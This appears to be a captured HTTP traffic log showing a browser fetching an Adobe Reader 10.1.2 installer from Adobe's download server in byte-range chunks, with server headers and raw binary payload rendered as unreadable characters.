.5...a.p....d1..!.....&J...(..3e...t....@1aQ..%M..$C...U...8.=........z}.Nj.^..(V....S..$.:...gr.....A..^X8..q....z..........\)U..).Q.;uW;.N.x..c...NE1b.......8.i...3....._.Rc.I>.0L.8H....OO......B.Z......NC.....%|[.2...t..L..\C.ub..F_.Lf. ...K..I.`'.o...q&)2....FJ(..;p.-J_0.l..f.0j...g.,........[....'.n5../@.&W.%.B.:87.....9...o..~8..Dx....i.WHM...$.[.....\.c6.u>..@y...`..5O......@FhX...R\T7P..M...O5.M.....j'6F.P...F.HUG.;.;aJI...z.c2.2.3@3...v......c............XS......7.v..X?J..W.!......I.?"QCf...\.......Oz;fT..1._....!......2.I.O..~).g....g...qo.....m.>@O]..#G\..G#........t..(J...m.:0.N}...`'..%B..s.>.......K..P.v.).E>.k{o...@.B}; f..<;.[.....{-...K..uv..D}.S.aN'....l.`.4z.j...i....Z..p....c.....L<<?O.v-]...d.Q.4..{-..".....u1.........G..PS.d..{..M..S.....F...de.&<.w...T.}.....!u.j8.7...:....9`.9......n.A.w.84l..SO.L. ..A...*..;...`oY..?C"0...o.n#...DU...KY...u.^...3.....j...X.....=....z.x....?..v.9.Q>._to0.#.P..k..[.,..?......M............&D..P.....2...?..r\........1.e..H......o2M.3...I/.|.rIq..].>...K..._.....N.. .n.....l...j.5NF.....K.s`..IGE....zb;o.>~.4`.Gxp.f..0u..Js...|..v.....m,,.i..@M...L...........[H\...r....*...Z.W..=.....U.."j. &...p.....BL.....F...4.R.&.m.{..c3qH.'.@O&.7..Q1.\L..m.E...Ju..Q.E...>....:.......F).0'_....2.....AeUQ..?....7....7..IW..............J...N1Gd.M....V^.KK#T.,.....M..{.Y.4.-..=y0.eq......Pb.............GW....8&YU......s....i..G.#,j ......#o..UCN..5f!.....l/....?.._:!.....Bn.X..\.d.......E.w.....#....*....M.E-.c...../=.U\.PV..U.D9....^q
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=27262976-28311551
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:13 GMT
Content-Range: bytes 27262976-28311551/53784984
Content-Length: 1048576
Connection: keep-alive
..zj.N"lpKKO}.~D....6..Cv..q...K.j.#a.DT.a9..f..q...*5.......}1.uK.....$..\=...f..^K.^....fq.t..C0.t.7..q....StMN........O@.sR...N8....O....!nmd.\....J.[.....AT.-.n.{..%..k....TE~..x> . _`...z.57....k..wH.......~.%a.._MW..uD..P..!S..X..7..T......6..;.([.b..E..zB...r.h=.`....L...F..=.(F..0'.T ..7.94P.z!!U..T.. ....F..|....1..U..^....._zg...v.D.........7...ZN.Tb......1R..1......o.N*$D..J.6...V..3......\.N....._T.s...P.;.....?.8.s|.....!..7J........".....V.V..r.t.z.|4....Z6.i.........[.......#..=...6...W.}...6!(.|....I.h.q_.h.........S!..].;].x31.x.m....7....>..(...,.....F.. ...O...7.T.i......t...._HYsa........9..m.....HFb."Y.Q.... y.t..#..Z..|.$....O.P....NiG....'.........{h:{.v....F$.Y.....@....y.t....C.Q_.g.8.<3J..b..V...V.6h(*4B.....js.z.GX ..$....,.....)......=....2..0..Or._.'..A...3e=X>c!.....]...Qa....{...*V.{....\....H.0.P8@\0......d......d6[..9.q.52.5...ö\wI.D.,i_n..`....T(....MfVCU.F.....J.I.j.Hk.=.C.d).. *.;M\..v.g B..H.....DB.'.C..{$..4.c.$..$B.{i.............B....=.. NT\...6.t...{....ImF..B(Gg.......$E.5.o..gi..?U.l..y.....Yz.o*.7..z0i..qW...C...;..}..w./..6&f...yW..O.H(\...}..K...]..o..v/V|. ..\2...3}$~).V...Q..$JJ..@........ .....Gj.S^~..M..v...m........=...A.>.OMM...j.....O.@........}.....Oz2........mL..j............ ..1$...g.u..j.B-*>..z#b.=.......^z@$..... @...K.....|..-%.[.y8eZ...QIb.W....M..n^.......@/.'........-l..&(.i..@%q..2..........U$l.._..ha....PyiQ.....y....Ec........U.[`....h...H.)...{ .3..Z(.spQ.KL.>.....}.}.FSS..Xes......1o.x.~b{q.............}.9ego*V...;;.`.G..
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=28311552-29360127
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:13 GMT
Content-Range: bytes 28311552-29360127/53784984
Content-Length: 1048576
Connection: keep-alive
.*........dE',._V&..O7.y......#YB..:.....gO.%|...........)-M..AQvU1-.f.ma".|e...,...B.4.c...{...f.....7.V`MB..Z..<..c..C.f..W..........~T.j)pb;...W....."w..:i..........G.[|.......K..qO.|`.N..;...H .$.{.'.....K2...&..8..XF>e..dW.....x.....&.}......B..Q....T..r)Y0..jW..F.p....gp..D..z.q....e...*...I..8.p.....t.....g.k.?./p.Ew....|..U..Z...KD........m....8......8.0.i.^Z.A.8...8..n.#?.o...aIQ.H......A.v...V..6@......2~>....#....O<Zl._.!B.......`.yT ...#p.O}....G.CU..@p.....G..%Lq.Y"X.*.]....E!.VZH............Q...W.._........F..O...z@I6....i.Q..k;.0..9Z...8@..J.....X.n......~zt.....G....0..p..E.Q....=j..6;m.s......V.*.....I...l*7w$oH)u...H........c..N...........8.....PO>?A.k....cX....IEf.....p....h5df..w..nX....Xg!/p7T.g2.[.;..`.....@4.0b.....h..w.S%..!..)G.Y.u .~....W".0M...0O..*..0....cv..,=4D...(&..iNHa../W.*........;F2>..F.B.v[.>.NV.0..:#.[`vD...XB..2..W...y..H.?....7...X.z......2i......=.I.8..E..........4..-.......S..{...[.a.........j....W.E.O..c..1...K,7..Y...3.].x.....|s.A6......<zw<....G........i..KI`...'PW~F2.m.o]..........=.RW..tw.F...7...o.C...%$o.'.w..$...&..-.'...:........&....V.....bM..#9.;.,8..'.t7c..HK..*G...:.P. D.pB2q..x...3...O.t.;.{......Kii..<Tz...a.wr<Vg..}.k.PV..)... :....\.[....(.s.Vx.z....J.c..c.b..B..0.h..6H.R.|@.]#..g.[......../d.I,f...?.ff.r=..m...I...<.........M..e$..e..&P.nK...q,..s.H.Q.t..~Lx.t...........}.'#.73..t.).k.w.}...>.=.......... y...: 1Y..C...`..........d......>y./....!.....0.rE.....gu...wx(Z&..E.........?...P.H.O,.r...g..x.Bcg.<a.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=29360128-30408703
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:14 GMT
Content-Range: bytes 29360128-30408703/53784984
Content-Length: 1048576
Connection: keep-alive
Oz.g^:N....;=.U...:R...No.n..rl.~........}$J:....e.F.....=...&p... .~...m..C...x.x....C.y.~.~l. .........!,@.>...v......*:...Na(j~../...a...~6F.]....N1..e.DbQ.....z!....u..nU....6.pv.#e.T@r...F....3bg I.S......7..5S..[%...J..9S..q....s......6.[...l.. ....o...=.s...5.5....L~.g.\..{...`......'.Z.C%........^....e......}Z.W..2O...3..V_..;.?7.:......g...[fL....n..7u.UPZ.......<..<U... ...T.jqz.h2$..<........*...|65...w.C.^..O<..D5..Q.f.lk.....'...y.....p?.3....{..r.9..V. ..Y...S..|(5....>........)..a.....=X..#z.....rp*.d^RJ...0_..`......W..$\...M.6~.T.....!=*.r.t...5?._.0O....0r.@.$.........>>......W0.]'.D'...^..7.....N.l.l.5.iY..G.l.#.W#..].l...w5..;3f.n..\1..$....q..T.%.....]C3..C@..;e.R.....]C.z.......)I........C.=.[K........y/b..).N.;{s.......D.....X...|......9q.X...H....6%|.a?..n...'e..#...."..|M6..r.......0A...c......SK.Je.IW...\....-.U13#.iP..\......8.L.,..:....'.~..h.NdW....W..{V..].r..E...e....>.U....m..w.F.w... .vAB..........L........B..##..=.......J.&|..V?..... ........ .w..~..E....-.....,=C.Z...A....W(.f.?pUS:....Rev...Z...Y.....c.;.Mg,.h...........Q.U...mIez...!..&.cs...HK.....{b.e..}...........W=b.B..<7.aIK..P..[...b.v../...`S...@....3.t...u\c$.^.......s.:!.. .....u......7.@....iq2W.VwN.....kjY.Az -.g<Y.d.4.N-..Y.y.A..H...w./.....~.....U.6./.....&..........r.x[\.u!.W.O..I..Q.>[.2..2T...n.x...t.........U.*.Wx/J.J.........J.j|.....H........6.>..L....:e!f............h.;yz.,)[..*...w....;.....U.M.M.........K3d.ey.(M.....':.n...Bs.Z.R.....y......22fp........4A(^....O..
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=30408704-31457279
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:14 GMT
Content-Range: bytes 30408704-31457279/53784984
Content-Length: 1048576
Connection: keep-alive
...:p.x.N....O..P...>.qTJ.D.. [RSd'w .....=GZ...Am.Y.0nv.|"...e.F.*l......\b.Y.&..A.@3.... ...x.F....xv....A.G....'oI..dN..3V`..5Sq.N..X.a..........V4y.rR~.-I.g...zG.]..w.9@m...s#T.^...T~....?....#...ax.|..b.....\-.....A..R................9~..e.jhr........./.5.N..h>.2X....p.....pfb.....s.u../..<......X..}s.\tvU.,uS.x.$`.nW..'.JP....!...<..9G..~~Pp.<.........4.{..J>)....Y..o.AuN..#...}.e...RnN tg\o..18.w...H....F . .wr.d......x.m.TD....4. I.X>R..........U.......N.t.STPF......&....*q.-6%.R....-...X.U.D.....!7C>...;...1..Y.....L9.M....c...~..."....M...zl..`R...9.....=...HP.2._o..wIw..M$.}..6........]........s|K.#F...........{X..N_..\i>.-...2.B.g..[R:g.....oX..W..t..0.......}./$).B...P.d...L..s....3.#...:.<.k.8M..){.....:k./.'~!...'.SW.'..,.iJ.f.....{.yHn=.n.7r.....P *z'..4s.,..-S. ......9......N..m4..lY`...KG...A0J,RDlk...{?u3.Vq.ck....Y".zL.)G.3..nQR..@4.../.$q...D......3..!1[."..;..o.8....@.{.,......C.S.x. ..i...q...B............V.3....3.. ...5S.B>.mVE...Z.......4.N...$..M..R..m3.W.!..<`.B......dl...M.h.$....u.....C?{q.\..KWo....R....T..t....uu...u..!!Q....?..(N.pJ....F....1.......34..;!p.f..y..... o...T.2 ....u...... ]f.O9.}..i....*...f...5..v..E,..<r..t].HzL....K<j8......|.E.M..:O..-..sV..].........<j..b.._...6...y..{W.HT7.Mr..t.k..t%}.G.....xC`...P..]..p^.*..DlO.@o,vP..=.<....cQ..$...6......_.Z.....]....q...j(..:. f<~B.d....m.*Wn.z0..F...?d{.m:.6.&.c.....$..lY.j.7...O.5m.B.6Z.3...F..=.\.C;.rF....l.....\...@o..G.A|.................\..;XP..R....;.W.v(.wS&j9/8T.
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=31457280-32505855
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:15 GMT
Content-Range: bytes 31457280-32505855/53784984
Content-Length: 1048576
Connection: keep-alive
9....b..9..U4VA...bY..,.....x_.......8........=.......pf.."...n.w..G.......7N.\"..R. .7(.{./ Lv..2..y.N...(..9.....c.9......8...n.~.S..".:I..p......c...O_...|..!..O0@.X...6.Q..&b.>..ZO.[......MT.qa.5...P.0.^0..v......7ii..nz............1M..f..\....P}E.f.8.mi... It.:.....h6....6x.y..N....a-..M....S..#...K7.^........U.`%o...!...v..c..x/F.h.n.....:z.i.3..?...`..#;<..v.N....2.....?.'..B ..[..5..{..T...!...UkC..p.`.@..l..........V.#`tJ...Wk...b....yJ...rHC ...w..).e......`..xk/.z...dG.D.yd.(.[..y\>...iUX.1.....N.F..*.C...@...zG.",..;..$...CR... >Y...lE......d...C.Q5..j......Z=d#.u.6...........,......L...J".i............2l.G7W.J..ao..*.t.!.'..{p..fa....B?.=..s..j..T..7@.z.p...g].%..t..c..:.a..d..,`l..|..{E.J...P.m?.....z.s1`v.LIF4..a..cN@.m.......7.-[".........c.YF..%...8...LP_.'/z..{q..}.=fC}ji.....Q(B...p*..['P..L....J./.t.9...T.78.5.....0...g..6...h.B.....7`.t... V........d.|................?. Ys.k.....#...qB.<.k...B...#M.1&j...)v..$...l,.^....Qc........qj.r.............qTw.....2........s......k.,.....,.h.!u....(...W../hV..>..{.h....j......]..]|.k..NP.Q.......@..?.@..h..v.}.q....3ca.!.r.J..W.y ...\EJE.1h6.$...v..a....&.C....6...T..K...^.4.....g..=:..|Tm.]......|%a.8.&....m...G.m/.d....M.<...R.........?..8.w........iQ:tx|..(...\D-."...(.....g0#.$...r@^.`.:.......H.@....^.....w..}...d.P.3.nF....n;V^..lU!kH....D..UQ*...b....f^..&ff..QE.'..vd.....5%.m.m.^.trPC5qzT...........5~...$k..w.J.....#.........F.n.......2.R.L&.jQK.ng{.:..6.....V....\..q\......4.....:...X..D.}.A"s.......D..p.h...!>.%....o
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=32505856-33554431
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:15 GMT
Content-Range: bytes 32505856-33554431/53784984
Content-Length: 1048576
Connection: keep-alive
.g.f.....&b.x]t...L..F.Be....Z......FkS.B...a.....,$...x......aw..U.W...i~h....E....s....._...0..;x.-h$....s..OF....C....$.......1%...A..Pq.......)T'..#.k.>...H..C.r...#...{.F.A.*.....;30& ...6........F-..9.r.]....Z.S.qG..jOW....M,....V..!.. ....<.D..j..2Kt..V..0......Z.`U...m~Q....;._...^6'.g."..2=.h.3..)."..{..}..=.....F...=N...asF\#V....[.YH.....yR.F.Z...KV..q.f...!....!....a......|...........4.b.%.....,P!.=..b..LW.]...I?....=....r.)-..SOg....6.KTX...|E...Wr..g....Q"...m.....UA..:.10.#p....-..L..F.h<d.....y....g.~O...hb...d.....>...2...R.X.4......E".jc...k..~..... .&...U.d1.7|.....'......"`..x-.9mW..o.;.pj.t.!.c.\.S.c.#...-....^...!..]_. 1#.'.y.A.|.%.[....|.J.c..Q..&....\~s6...z;.(.^;..$......BT...bh.:..x........Liw." $E.6..'? .n*...}.'..._#Z....hQ....cW.z...C]...@H...{5k.).c.P.A...*g........].I..ZB'..,....\..#^v..1.5J..8{.....#M.=..>....0.=,8..yV@:'SF.L...?t....L.........M.Ue..I..!..c.}....i..1..;.g.r<1...........V5..U.?)@...31Q.Y....c..G..s...dV!$.j......t..........U.y....Q......\.`.b..d.C~...PoaSs.|.....H `..q.i.B...6...Z..V.{..r........<..F.....jH..."..G.........z1.v.....~~..e. ...r~.y...3..?..;P>. ..l.Rtg....E.[.... -]#{.x..5..&...If..h..P.....(....B...[..g.&-gE....x.4U... U).lT....G..,.{o....g.l0..lc...q.c%.t)[.9D..4j.....G.....A0._?.E.M.*....lS.... LJf..e........"..0PzY.s.~...zQ5..R.#..:fN..[W..V:..W05..q.....|..l.?.M...0.=.I{Eo...)..6.>.......$&H*fT.-DJ.R...I.3.q0...GZa...j#..W2...4.wYk..te..6#....2.y...J_.64...i......Q.....i....4.Y[....q7..R.5.;..G1.....~..w..B......C.....
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=33554432-34603007
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:16 GMT
Content-Range: bytes 33554432-34603007/53784984
Content-Length: 1048576
Connection: keep-alive
.T..W..1.<.........D)...}>........X.....vW.C.V.P4g..cR...Jw...`.$.X.oK..U...M.w5.t...5RK#e....&,u....wS.......w.B........d}e.H..U].s~..{d......T.z....8c....B..Z.kN#..o.. ......,......,s....CY.....J..E&.qy........-.\.hc....oc.*.........G.c_.&.b!P.2..6G2.$..F[1.$Y..2L9..?.. ...x..B.8..M..N.......B..6..M..$c.K..P ....iE.:...'9EN.....W. '..gj..)......6.6........*.B..k.....t*.......z...k.d.' y0.@.~u..yk6.<...`. #..*M..a..qr...k.C.r.jI.....#.f..I..t..N^. .....0..oa......n.U.......b..XY..C.3.x$...`b.]M...dc .b[..X..'.,E.C....I\Y:.t.><..wyG.9........l8..........._...5.hhR.K....J..q.....`..8Ml)]MY.u...Z7.#!..........n..F...E.4/..H.#...#..0.a{.../E.icg.....)hiq/.[/.PW.F,.......O..as....D/.^_....0c.\R.T q._0kr<q<A_... 0.P.u.e-."@.%i...p)B........]......}....K%....p...;.?..mHX....B.E|..y.../yW;.....8I.....z....p.@.........(.7.'S.I... .7./.0....<..(...TK.6.h.A..$..?.Y.....s...%.%.~.E.Il.[}.....y.O.03...W.......-.(r.=.G......S..Z.h..<.....o.....m.2.I.TX.E..%..X..g.y.w......j... ..h#..lI.)6.Z.h.S.....0....sU.l...ME(...=/].."...7.........U:....u...!.....Y........d.N...dP..D.mLP..\.o*.....}.Xb..BV...F...bE..*..i.L^.0._Dn:......oY.%_!b..x....4!.Vl3.....^h.O..m.h"...{.~m.....F.q...*.zL..1.B..5....]._v,y.B<;.\...'...e.FE...p..A.Fo..Q.Dy.......e".;'./T....IA`.._&.b..v*G."_..rK..*q E.n<W.....0&.Dn......E...n@..<...r...0q....=.......y]....\F..:..e.0..g...&.0......P).....tXY.DHf..~...W.....\.s.M.....[c.VI/....phUF....X...B..........vq.IL.,T>A...$w[.Bk.....<#...`.6..\.....=..(.jW...*.._c.S.....
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=34603008-35651583
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:16 GMT
Content-Range: bytes 34603008-35651583/53784984
Content-Length: 1048576
Connection: keep-alive
....T......<;...D...o.].y../.S...D.e.mw?..r..AI.9.3po.|T.n..;k...K|..#..../.`.<...(..........K{=H...E1.O..1...&C.8i....@2.v.Bfg...(@.3F..].4g..D..B.....e../6..e..Z.rN.......9...<.B.....(d...]$.:. H]..........*3...F..'..S.?.r......Us..iR..a5...>E.....7.&~.L8.k.g>.~....1.(....|.3"..G.y.E......nh.z...:..0..W!...3... .&....h.....7....S.I.y&B/{X... <..y.j"Q..{...b1qSU....a.>P.(.=9l$,..v.......S.G./..X.C.'3Lox..' .=..0..N;..l...K...E.Aq.d3}D../t..>...cY2Q7.K....a.k....Rb-..S. ..G...a..N....-=.%d...y..:...~[.7m7.Jn&..... uU.pZ*R.#..U".R,.i.O ....."$T..F/.D.tF.<......;.Z......C...K..-.yJO....a1...7......C.J.9g..G ..qT.4.E....g.3<.$.7..lt.f.0.K|.t... ^.I....5|..`&.......x.M<.Z,K...h./.|.[4.o.k.....^.8..^^.............V_.. J..0.mG.EkM,${..*..].D.O.Y..Y.u%|.h2..(`..G... .....P.]K...P...U.2O....^.cuY..f.Q....&.i..Bs.c.."|......6...;}...=...x.....X]..(.....L...Iy\.a..=7..r...k.t[9.`.?7.4[...=..\..,.~L...!.>.2.*.1.E.....T..KnA...rC.Xf...a2..1S....y.El.....DVRl.R:.m`QjF:.1%..}Au. 4........0p.....e(..y...[.....7j...........7...2..I..R..<P..L..vH..F1.[..C...8w.e..3a.U?.D.....k]...SpF.f.....x......I=.Naq......2./K...}.U....n].......L.M.#.o.V^G....Usf.d\..!_.......N..b..U....m....}..eE..eq.%;..._.......4.V/.~.#...:.C."...j.........u..D.Vw...X...I...u. ...9...$=....-q...'^....I...$g...{e..j.>.....f.d.|.........*.....|.H\.V....3._l-c...(Q.......bW.....&.:..T......<....LH-.#9..\<...._k.c..|..._.&.......U.U<4.......{.......).._.....@]..M.....)".r..2.-$.X1....."..R0...qh....A..~.....~
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=35651584-36700159
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:18 GMT
Content-Range: bytes 35651584-36700159/53784984
Content-Length: 1048576
Connection: keep-alive
..-.n)...-...-$.jS.../.....E..-...b....f"zGH..Pz..X.}.N`.$iH.<...M~.}..`.#.M..u.....{..d(5RZ;.~...$.........I.kH._.l.9..W.L.L9.2`M..Q...|M..V.GY....&qAh@...f...A%I..../.,.. .....8..v!.%...E.h;f.Mr.L;/.Zw.&.o..V..P...7.=.....N..Bv..|.Q#W.~....:.?..^w.....a....k..;..~..U.....P.?q*6\......*....Q.V.v.=.u.-`....]..W.F....<.bw ..Fp..oW%%......M7........L...UM.5|[G..Q..@...N7.1<..&...3.;.pV........f.....3E.......V..X.........r.o..#/..v..H.. M..EBa.......g.oo.g.f...v.`.-....'SO.a .V....d.Q..5.G/.(..m.k..Dq..%........l....).Y.....:.`h.-..<!..,...R......*.....P.W.VT.... .....O..E.......JJ......U!.] .K.....<.n..N.n...;[..y}K.n...=.o.i6...Fp@.v.Al.=v*2U..#..h9Ib6.....jL.JO...^..o...-83....9.W.........\..T'.L)..\};n.l.....R....E..G..PuFb. ...s..@..g....(..{d...b.V;..C....*..'p.}.8...=F.:....y-...~LN.......z....)....c..U...h.N.........y..q..cl........n....T{{...@.H.%o..@....=.3....'...,...q..F..).|.......q!..............c'...)wU...r.t...0....y.t.3v.h.. .P.wb)K...<..*Mx....".#...G.....;....=.x.3.-l....#r.._I.wb......f.....vs.x....._vi;e.Q.6....).J6....:Q.d.&.vu...........3.c.P....3.v../.X..*...X~..V..#....q[..N....].F......i..n..P@=..0......;."o.7Ou_.....f..P........c.6..`.}.q.f....?Is......:...7.......3...y.....<{..7#\3-...[..a.....s..N......v.E.j.p.O.....;H.........h...'O...h.\..N..o....s..<..x........`.......>.....B...F.v?....V#PLt./...|H..G...:.......\IO..6B.... .@g.q...........l....i.fPf.AJi|...../..s.....2Y...(........_..5..0Y...|n..v.z..........%XLv.4.......D..H..rd....0[.......0...v<.....
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=36700160-37748735
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:18 GMT
Content-Range: bytes 36700160-37748735/53784984
Content-Length: 1048576
Connection: keep-alive
.%{.=<._3x..>....vK.s.....Z.!......P...:.....Pq..;....z.Q,..../hd?.Ba...B...^...I.Ie.....*.0..*.9........h.fjd..!....E..\ps....Y.... ~.!=)p..T>..r..._...DX...M...~X.&......m...'Y...7.S?..........dl...\.nH...x.N..E{........B...`......"R..:6D............=H.//?.B._F.#..T4..eu...O..Bvm[||........H&.jeW.ZIMi ?.)y..*..nP;.sM.p....J..G..m....d..)n8.9.... .z..@#.J=).W...R..c...-N.....EK....ZXS..7.0D..f.4.K..........,{a..<s........_..[...j..2'.$......c....Y{.,'.....6....J%.<.v...p....W.............4.!..&3.......o....E#..6&M...~...Y.m.u .C..~...futLF...)Ds..A..g-.BJ.......W..yE.?M....z..b$.....Ft.....EY.H<........"].t..".1..|#%..4..L_...@.=Y..p#...5...X...}.v._...........e........].-s!...Cz4.fB4..h.E.n?M&...y.._..s..c.\...<...I...s.gG&.1n....=.....Eh._.........B.o...91>..;...{.Y].".z..A[..v.C...I....a.....c^.8^.......k....h.h.E......=.oq.L..$b.u0T.-.D. .W.,.h...W...(..@...TI.8I%@.{........<.79...U.v.....N.._...A.y....X..../...M.9'/{<..GwY6.S....P.2.......W...>......iM.........W.r.....m....s0....wN...}N.....X._.../Nr..-..[. ....._..7..... .|....j.......v.Z...........:..lj..P2...$B......27..7a.]q.'..(...wu.......N!2.4}...j...../B....>}:.9i..d........`..6...,..TR:.U.,_...M.{H.c.:.W.gM..-.k....}Z.....c.......%tp2.......k....c.....<.`.`..x....d.....u...u....$..../C.j....^......3..(..}3.B........g.6.{....&_.N.k.W.[.7_....7.@..o.`...y..E5..........-...'?.PR...w...~....r...`.!.c.....r..xL...fY.........._/.].)....z....e.}....M%.......(...3.5.s.e=.x2..N%.\.F@...2...I.c.g.{..3...\...).....L...
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=37748736-38797311
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:19 GMT
Content-Range: bytes 37748736-38797311/53784984
Content-Length: 1048576
Connection: keep-alive
